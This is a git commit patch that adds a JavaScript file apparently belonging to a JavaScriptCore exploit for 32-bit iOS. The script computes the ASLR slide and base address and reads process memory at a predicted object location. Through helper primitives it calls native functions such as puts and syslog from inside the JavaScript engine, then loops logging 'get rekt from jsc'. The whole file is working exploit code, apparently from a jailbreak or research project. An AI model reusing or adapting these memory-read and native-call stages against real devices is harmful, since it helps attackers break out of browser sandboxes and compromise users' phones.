From 245a3831d7266913b0281bfa19058b59ac80818b Mon Sep 17 00:00:00 2001 From: spv420 Date: Sat, 23 Apr 2022 18:22:31 -0400 Subject: big b0i --- src/js/main.js | 58 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 src/js/main.js (limited to 'src/js/main.js') diff --git a/src/js/main.js b/src/js/main.js new file mode 100644 index 0000000..dd7f1f0 --- /dev/null +++ b/src/js/main.js @@ -0,0 +1,58 @@ +/* + * november 24th 2021 + * [3:16 PM] spv: spice confuses the shit out of me, so i'm prolly not smart enough to implement it anyway + * + * ohai + */ + +var MAX_SLIDE = 0x3; +var MIN_SLIDE = 0x1; + +try { + log("we out here in jsc"); +} catch (e) { + /* + * we don't have log. :( + */ + + log = function (){}; +} + +function main() { + /* + * get slide and calculate slid base + * remember, 32-bit *OS defaults to 0x4000 for the unslid base for exec's + * + * so, take the slide, shift it by 12 bits (aslr is calc'd by taking a + * random byte and shifting it 12 bits, in this case the page size, 4096 + * (0x1000) bytes), and add it to the unslid base. + */ + + slide = get_our_slide(); + base = 0x4000 + (slide << 12); + slid = (slide << 12); + + init_sptr_heap(); + + calls4arg("puts\0", sptr("we out here\0"), 0, 0, 0); + + log("slide=0x" + slide.toString(16)); + log("*(uint8_t*)base = 0x" + read_u8(base).toString(16)); + log("*(uint16_t*)base = 0x" + read_u16(base).toString(16)); + log("*(uint32_t*)base = 0x" + read_u32(base).toString(16)); + + predicted_jsobject_addy = 0x422200; + buf = read_buf(predicted_jsobject_addy, 0x200); + + log("hexdump of predicted jsobject loc:"); + log(hexdump(buf, 8, 2, predicted_jsobject_addy, 8, "0x")); + + var i = 0; + while (true) { + calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0); + calls4arg("sleep", 0, 0, 0, 0); + i++; + } + + log("still alive"); +}; -- cgit v1.2.3